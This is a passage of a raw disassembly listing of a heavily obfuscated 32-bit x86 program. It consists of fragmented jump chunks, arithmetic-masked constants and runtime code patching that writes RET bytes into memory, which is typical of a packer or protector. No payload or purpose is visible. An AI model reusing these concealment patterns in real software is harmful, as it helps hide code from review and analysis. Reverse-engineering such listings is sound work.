; END OF FUNCTION CHUNK FOR sub_447CBE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EE25 proc near ; CODE XREF: ut7h7i2x:loc_4392C2p
; sub_43C1E5+6p
push eax
mov eax, ebp
xchg eax, [esp+0]
mov ebp, esp
jmp loc_44FA77
sub_43EE25 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43EE32: ; CODE XREF: sub_447EB5:loc_4542B3j
and eax, 998DDACEh
call sub_451B75
; END OF FUNCTION CHUNK FOR sub_447EB5
; START OF FUNCTION CHUNK FOR sub_44E3FD
loc_43EE3D: ; CODE XREF: sub_44E3FD-12534j
jmp loc_44FC0B
; END OF FUNCTION CHUNK FOR sub_44E3FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43EE42: ; CODE XREF: sub_43A556+5DB0j
; sub_43A556+5DB9j ...
call sub_455775
loc_43EE47: ; CODE XREF: sub_44640F+12D9Dj
jmp loc_455A1A
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_43EE4C: ; CODE XREF: sub_4469B9-D3E0j
jmp loc_45269A
; END OF FUNCTION CHUNK FOR sub_4469B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43EE52: ; CODE XREF: ut7h7i2x:0044E3A5j
push 635FFBFAh
mov edi, 94F668DBh
or ebp, edx
jmp loc_45A758
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583C4
loc_43EE63: ; CODE XREF: sub_4583C4+Cj
jz loc_445E53
jmp loc_43D782
; END OF FUNCTION CHUNK FOR sub_4583C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_43EE6E: ; CODE XREF: sub_45A79F-2813j
jle loc_441FD5
cmp ebp, 44B0B05Fh
jmp loc_43A01B
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push ebp
push edx
jmp loc_4396C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_43EE8A: ; CODE XREF: sub_44C8F3-10AB7j
; sub_44C8F3:loc_452AD7j
lea edx, [ebp-14h]
push 77FFE601h
pop eax
xor eax, 89F03784h
add eax, 233CECFh
call sub_43F058
lea eax, [ebp-14h]
push ecx
jmp loc_442243
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
loc_43EEAD: ; CODE XREF: ut7h7i2x:loc_44A9FEj
xchg eax, [esp]
jmp sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43EEB5: ; CODE XREF: sub_44DF79:loc_43A04Dj
adc ebp, 5655FF02h
jmp loc_43F980
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
push esi
jmp sub_4401C1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43EEC7: ; CODE XREF: sub_43AA94+AF05j
jmp loc_43BD59
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
dword_43EECC dd 56A9AEDCh ; DATA XREF: sub_446320+6r
; sub_43EB8A+7A71w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_43EED0: ; CODE XREF: sub_45742F+Cj
jmp loc_44EB58
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_43EED5: ; CODE XREF: ut7h7i2x:00455534j
jmp loc_444177
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_43EEDA: ; CODE XREF: sub_43CAF4+F254j
jmp loc_457F60
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_43EEDF: ; CODE XREF: ut7h7i2x:00449B3Cj
jmp loc_45744D
; ---------------------------------------------------------------------------
push offset loc_44531D
jmp locret_43EF48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43EEEE: ; CODE XREF: sub_457A66-6CEAj
sub ecx, 7BEB6500h
loc_43EEF4: ; CODE XREF: ut7h7i2x:loc_452FCCj
sub eax, ds:4000F0h
xor eax, 7274B2A4h
add eax, ebp
add eax, 0BDC08CC2h
mov eax, [eax]
mov al, [eax]
jmp loc_44D7F4
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
jmp loc_45AAF6
; ---------------------------------------------------------------------------
jmp loc_4477F3
; ---------------------------------------------------------------------------
loc_43EF1B: ; CODE XREF: ut7h7i2x:0043FAA9j
push ecx
push 71EF2C73h
pop ecx
sub ecx, 116E2E14h
jmp loc_452CA5
; ---------------------------------------------------------------------------
loc_43EF2D: ; CODE XREF: ut7h7i2x:00445A34j
or edx, 0D7D3B180h
add edx, 84CE6DBh
mov edx, [edx]
or edx, edx
jnz loc_44A137
jmp loc_44ED88
; ---------------------------------------------------------------------------
locret_43EF48: ; CODE XREF: ut7h7i2x:0043EEE9j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_43EF49: ; CODE XREF: sub_4402A5+Cj
jmp loc_4460C3
; END OF FUNCTION CHUNK FOR sub_4402A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_319. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43EF4F: ; CODE XREF: sub_4524FE:loc_4571E9j
add edx, 0C5699835h
; END OF FUNCTION CHUNK FOR sub_4524FE
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_43EF55: ; CODE XREF: sub_4589E0:loc_43D86Dj
xchg edx, [esp-8+arg_4]
jmp sub_441A79
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452BE9
loc_43EF5D: ; CODE XREF: sub_452BE9-11ADBj
push edi
call sub_44EC6F
loc_43EF63: ; CODE XREF: sub_4598B4+Dj
jmp nullsub_151
; END OF FUNCTION CHUNK FOR sub_452BE9
; ---------------------------------------------------------------------------
loc_43EF68: ; CODE XREF: ut7h7i2x:loc_453CC9j
ja loc_440ECE
jmp loc_446483
; =============== S U B R O U T I N E =======================================
sub_43EF73 proc near ; DATA XREF: sub_446599:loc_445B5Fo
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043A1EE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004404BB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441457 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441C4E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004434FD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444F68 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044543B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00445A69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004471B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004477F3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449C43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A6BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BFBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C2A8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C351 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CA34 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E586 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004502CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520CB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452C2B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453F40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045415B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B88 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456E5A SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457118 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045778D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004577C2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00458413 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458A72 SIZE 00000005 BYTES
push ebx
push 72E44AFFh
loc_43EF79: ; CODE XREF: sub_43AED9:loc_4457E0j
pop ebx
or ebx, 0A6A7D1C0h
add ebx, 0F34D050Fh
jmp loc_457118
sub_43EF73 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43EF8B proc near ; DATA XREF: ut7h7i2x:004447F3o
; FUNCTION CHUNK AT 00452524 SIZE 00000005 BYTES
mov byte ptr [eax], 0C3h
jmp loc_452524
sub_43EF8B endp
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push edx
call sub_4522EB
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43EF9D: ; CODE XREF: sub_43AA94+1A4CBj
jmp loc_44D0A4
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
xchg esi, ebx
jmp loc_4433B3
; ---------------------------------------------------------------------------
jmp ds:off_41D0A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_43EFAF: ; CODE XREF: sub_4463D6+1j
jmp loc_43A2CE
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_43EFB4: ; CODE XREF: sub_44AFFD:loc_444DF0j
; sub_441765:loc_446263j ...
pop edx
jz loc_43D129
mov eax, [esp-4+arg_0]
push edx
jmp loc_44747D
; END OF FUNCTION CHUNK FOR sub_441765
; =============== S U B R O U T I N E =======================================
sub_43EFC4 proc near ; DATA XREF: ut7h7i2x:00458DDAo
; FUNCTION CHUNK AT 0043FF9F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C3E7 SIZE 00000005 BYTES
push 748828CBh
pop eax
xor eax, 0D83D18B9h
add eax, 538ECFF6h
jmp loc_43FF9F
sub_43EFC4 endp
; ---------------------------------------------------------------------------
loc_43EFDB: ; CODE XREF: ut7h7i2x:0044F598j
jz locret_4398E5
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43EFE1: ; CODE XREF: sub_452D3D-25F5j
and esi, 21439CF2h
add esi, 0FF03334Bh
xchg esi, [esp-4+arg_0]
jmp loc_45251F
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
jmp ds:off_41D1F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FFC
loc_43EFFB: ; CODE XREF: sub_449FFC+12j
jmp loc_459E36
; END OF FUNCTION CHUNK FOR sub_449FFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_43F000: ; CODE XREF: sub_450F0B:loc_43CCD6j
; sub_44CE09:loc_4422F8j ...
jz loc_44F08B
xchg ebx, [esp+4+var_4]
push ebx
pop edx
pop ebx
mov eax, [esp+0]
push edx
jmp loc_44A7A7
; END OF FUNCTION CHUNK FOR sub_44CE09
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F015 proc near ; DATA XREF: sub_43C9F5+EF0o
jmp sub_44F7F8
sub_43F015 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43F01A: ; CODE XREF: ut7h7i2x:0043A2C3j
; ut7h7i2x:0043AA76j ...
mov dword ptr [ebp-4], 1
mov eax, [ebp-4]
mov esp, ebp
push offset sub_459C5E
jmp loc_439C78
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43F030: ; CODE XREF: sub_447EB5:loc_4441B1j
and edx, 1FAF99B2h
ja loc_444DB7
cmp eax, esi
jmp loc_451E1D
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
loc_43F043: ; CODE XREF: ut7h7i2x:loc_459FC5j
jnz loc_448DFD
jmp loc_4428C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451039
loc_43F04E: ; CODE XREF: sub_451039+2029j
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_451039
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F058 proc near ; CODE XREF: sub_43A9EE-1589j
; sub_439FD5+8p ...
; FUNCTION CHUNK AT 00452C1C SIZE 00000005 BYTES
push ebp
mov ebp, esp
jo sub_4464B7
jmp loc_452C1C
sub_43F058 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E26
loc_43F066: ; CODE XREF: sub_453E26+10j
jz loc_446F0A
jmp loc_4515D1
; END OF FUNCTION CHUNK FOR sub_453E26
; =============== S U B R O U T I N E =======================================
sub_43F071 proc near ; CODE XREF: ut7h7i2x:0044053Bj
; ut7h7i2x:004501D8p
; FUNCTION CHUNK AT 00445D1F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F062 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506AF SIZE 00000024 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 0C2A1254h
pop ecx
xor ecx, 0B8DC5B34h
jmp loc_44F062
sub_43F071 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43F087: ; CODE XREF: ut7h7i2x:00454FCFj
xchg eax, esi
test edx, 2DEC56BFh
loc_43F08F: ; CODE XREF: ut7h7i2x:loc_44F9C8j
jmp loc_45A3AA
; =============== S U B R O U T I N E =======================================
sub_43F094 proc near ; CODE XREF: ut7h7i2x:00441E91j
; sub_4528B1p
; FUNCTION CHUNK AT 00446774 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004516AB SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, cs
xor al, al
or eax, eax
jnz loc_44677A
call sub_449217
or eax, eax
jmp loc_4516AB
sub_43F094 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43F0B0 proc near ; CODE XREF: ut7h7i2x:0043EBF8j
; sub_43B4E3:loc_44A592p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A22F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CE0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E498 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FECD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004403B1 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00440F7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443ABC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443D96 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004481CE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004489BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FEC4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004548B1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00458016 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00458DF6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459AE8 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
sub al, 99h
push 0C75C9981h
jmp loc_4481CE
sub_43F0B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450F2A
loc_43F0C0: ; CODE XREF: sub_450F2A+5j
pop ebx
call sub_44A7D2
loc_43F0C6: ; CODE XREF: sub_445188:loc_444336j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_450F2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_43F0CB: ; CODE XREF: sub_4518D7:loc_43ED70j
jnz loc_441FB4
loc_43F0D1: ; CODE XREF: sub_445DB4+FFB6j
jmp loc_44FCB8
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_43F0D6: ; CODE XREF: sub_43A513+88CFj
jmp loc_441097
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
cmp edx, 121C52E0h
jmp loc_44FD41
; ---------------------------------------------------------------------------
loc_43F0E6: ; CODE XREF: ut7h7i2x:0043F17Dj
; DATA XREF: sub_4431BB:loc_43E98Bo
shl al, cl
push 443F35F0h
pop edx
add edx, 5C1AC12Ch
test edx, 4
jmp loc_4403A0
; ---------------------------------------------------------------------------
loc_43F0FF: ; CODE XREF: ut7h7i2x:0045622Fj
adc ebp, 67D03466h
cmp ebx, esi
jmp loc_45955F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_295. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_43F10D: ; CODE XREF: sub_44A3BB+9BE4j
jmp loc_4432EA
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
loc_43F112: ; CODE XREF: ut7h7i2x:0044BD6Bj
jmp loc_45246C
; =============== S U B R O U T I N E =======================================
sub_43F117 proc near ; CODE XREF: sub_4551D3-4ACAp
; sub_4431FF:loc_452077p ...
jz sub_452857
push offset sub_44DA3B
jmp nullsub_194
sub_43F117 endp
; ---------------------------------------------------------------------------
mov edi, 0A5AFB9F5h
jmp loc_44933A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_43F131: ; CODE XREF: sub_43AED9+11031j
or edx, edx
jnz loc_443F9E
jmp loc_448A8D
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
sbb edi, 0AB7CFF1Eh
mov ebp, [ecx]
jmp sub_45439C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_43F14B: ; CODE XREF: sub_446258:loc_443498j
push 73A0E486h
pop eax
or eax, 0F302DCAh
jns loc_45373A
mov edi, [ebx]
jmp loc_449451
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43F164: ; CODE XREF: sub_44D1F0-C036j
cdq
loc_43F165: ; CODE XREF: sub_44D1F0:loc_4411B3j
add edx, 0CD3CE14Fh
mov edx, [edx]
push offset loc_44A523
jmp loc_450508
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_43F177: ; CODE XREF: ut7h7i2x:0044C1C8j
jnp loc_451A7E
jb loc_43F0E6
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43F183: ; CODE XREF: sub_43DBEC+E5C6j
call sub_455461
; END OF FUNCTION CHUNK FOR sub_43DBEC
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43F188: ; CODE XREF: sub_43A556:loc_443352j
xchg ebp, [esp+0]
mov ecx, ebp
and ebp, ebx
jmp loc_445716
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_43F194: ; CODE XREF: ut7h7i2x:0045957Fj
sub edx, 0D01FB95Fh
; =============== S U B R O U T I N E =======================================
sub_43F19A proc near ; CODE XREF: sub_44EA25+18p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043941D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043ACCC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043BF49 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 004497BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F02 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A770 SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
add ecx, ebp
push ebx
push 102E4B1Ch
pop ebx
and ebx, 2022C080h
jmp loc_43941D
sub_43F19A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43F1B2 proc near ; CODE XREF: ut7h7i2x:004391D6j
; sub_43F1B2:loc_43FAB4p
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439AD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439F92 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 0043B894 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F501 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FAB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004403B2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004405C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044085E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004429C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442AC0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442F50 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004437CA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004444FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444926 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446399 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447BD5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044831C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490FF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044B89C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044BF57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C96F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D1DB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451AAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452E49 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004547BC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456BE8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045768E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577B8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045978A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459F68 SIZE 00000016 BYTES
xchg esi, [esp+8+var_8]
pop esi
jmp loc_4405C0
sub_43F1B2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_43F1BB: ; CODE XREF: sub_43F0B0:loc_43E498j
; sub_439B27+103E0j
pop ecx
jmp loc_457A5A
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_43F1C1: ; CODE XREF: sub_43DCFF+B8C1j
jz loc_44DCC5
loc_43F1C7: ; CODE XREF: ut7h7i2x:00452105j
jmp loc_43CC39
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
xchg edx, [ebx]
jmp loc_44C2E2
; ---------------------------------------------------------------------------
loc_43F1D3: ; CODE XREF: ut7h7i2x:00446005j
cdq
add eax, edx
jmp loc_4557EE
; ---------------------------------------------------------------------------
ja loc_43B515
jmp sub_43964B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C2ED
loc_43F1E6: ; CODE XREF: sub_44C2ED:loc_440D01j
mov ecx, edi
pop edi
or ecx, 762B723Bh
and ecx, 0CFC76D17h
or ecx, ds:4000F2h
add ecx, 1200FBD0h
xchg ecx, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_44C2ED
; ---------------------------------------------------------------------------
loc_43F209: ; CODE XREF: ut7h7i2x:0043F460j
xchg ecx, [edi]
and edx, ecx
jmp loc_44C56E
; ---------------------------------------------------------------------------
loc_43F212: ; DATA XREF: ut7h7i2x:00447206o
or eax, eax
jnz loc_453C82
jmp loc_45596E
; ---------------------------------------------------------------------------
loc_43F21F: ; CODE XREF: ut7h7i2x:00449401j
mov ebp, [esi]
pop eax
loc_43F222: ; CODE XREF: ut7h7i2x:loc_441AF3j
mov eax, offset off_4513B0
mov [ebp-4], eax
push 884B4A4h
pop eax
sub eax, 0E7575905h
add eax, 0DF17B86Dh
jmp loc_45643F
; ---------------------------------------------------------------------------
sbb edx, ebp
jmp loc_45975E
; ---------------------------------------------------------------------------
loc_43F248: ; CODE XREF: ut7h7i2x:00448166j
push ebp
; =============== S U B R O U T I N E =======================================
sub_43F249 proc near ; CODE XREF: sub_44EA6A+9p
xchg esi, [esp+0]
pop esi
mov ds:dword_41D17C, eax
sub_43F249 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_43F253: ; CODE XREF: sub_4406F1:loc_442014j
jmp loc_4450D6
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
loc_43F258: ; CODE XREF: ut7h7i2x:loc_452B85j
pop edx
add ebx, 0D3DF7558h
xor ebx, 6FEA6417h
add ebx, 86316F7Eh
cmp ebx, 0D8AEAF77h
jmp loc_4506DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_43F276: ; CODE XREF: sub_443A45:loc_443A4Aj
cmp dword ptr [ebp-4], 0
jnz loc_44B420
; END OF FUNCTION CHUNK FOR sub_443A45
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43F280: ; CODE XREF: sub_43D021:loc_43F8BCj
jmp loc_44AF09
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
loc_43F285: ; CODE XREF: ut7h7i2x:loc_43ACABj
call sub_43AA94
mov ds:dword_41D110, eax
lea eax, nullsub_471
mov byte ptr [eax], 0C3h
jmp loc_44EC44
; ---------------------------------------------------------------------------
loc_43F29E: ; CODE XREF: ut7h7i2x:0044D231j
mov eax, [esp]
push edx
push ecx
push 0A3551C1Eh
jmp loc_4590A6
; ---------------------------------------------------------------------------
loc_43F2AD: ; CODE XREF: ut7h7i2x:004455A0j
xchg edi, [ecx]
jnp loc_445A22
loc_43F2B5: ; CODE XREF: ut7h7i2x:loc_459B1Ej
push ecx
push 2819B437h
pop ecx
and ecx, 0F6862F0Bh
jmp loc_44E333
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43F2C7: ; CODE XREF: sub_447CBE+5F51j
jl loc_4573A0
and esi, 11BC2275h
pushf
ror ebp, 1Dh
loc_43F2D7: ; CODE XREF: ut7h7i2x:00449970j
add ebx, 8661DC4h
jmp loc_4462A5
; END OF FUNCTION CHUNK FOR sub_447CBE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_43F2E3: ; CODE XREF: sub_45601B:loc_449E45j
cmp al, 0A4h
jz loc_448B0A
jmp loc_442E9E
; END OF FUNCTION CHUNK FOR sub_45601B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_273. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43F2F1: ; CODE XREF: ut7h7i2x:00447E66j
jmp loc_452322
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440DA3
loc_43F2F6: ; CODE XREF: sub_440DA3+3j
jmp loc_4425A0
; END OF FUNCTION CHUNK FOR sub_440DA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_43F2FB: ; CODE XREF: sub_44064B-635Bj
jmp nullsub_294
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44339F
loc_43F300: ; CODE XREF: sub_44339F:loc_443ED8j
push esi
push 3EFD25D8h
pop esi
and esi, 0A1FBA5B3h
add esi, 0DF4C4FFDh
xchg esi, [esp+4+var_4]
jmp sub_45601B
; END OF FUNCTION CHUNK FOR sub_44339F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_43F31B: ; CODE XREF: sub_45633E:loc_4487CDj
or ecx, 52768C1Bh
add ecx, 0AD46FE50h
xchg ecx, [esp+0]
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
js loc_44C62B
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_43F335: ; CODE XREF: sub_4408C2:loc_43B776j
jmp sub_4432F5
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_43F33A: ; CODE XREF: ut7h7i2x:loc_453AC2j
mov ebx, eax
jmp loc_457F2B
; ---------------------------------------------------------------------------
add eax, 3C2BDE33h
jmp loc_44FC9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_43F34C: ; CODE XREF: sub_4583E7-C2E2j
sub ecx, eax
not edx
shl edx, 1Ch
sub ebx, eax
xchg ebp, [esp+0]
mov ecx, ebp
jmp loc_440F4D
; END OF FUNCTION CHUNK FOR sub_4583E7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_258. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453EBA
loc_43F360: ; CODE XREF: sub_453EBA-A6B7j
jmp sub_45108E
; END OF FUNCTION CHUNK FOR sub_453EBA
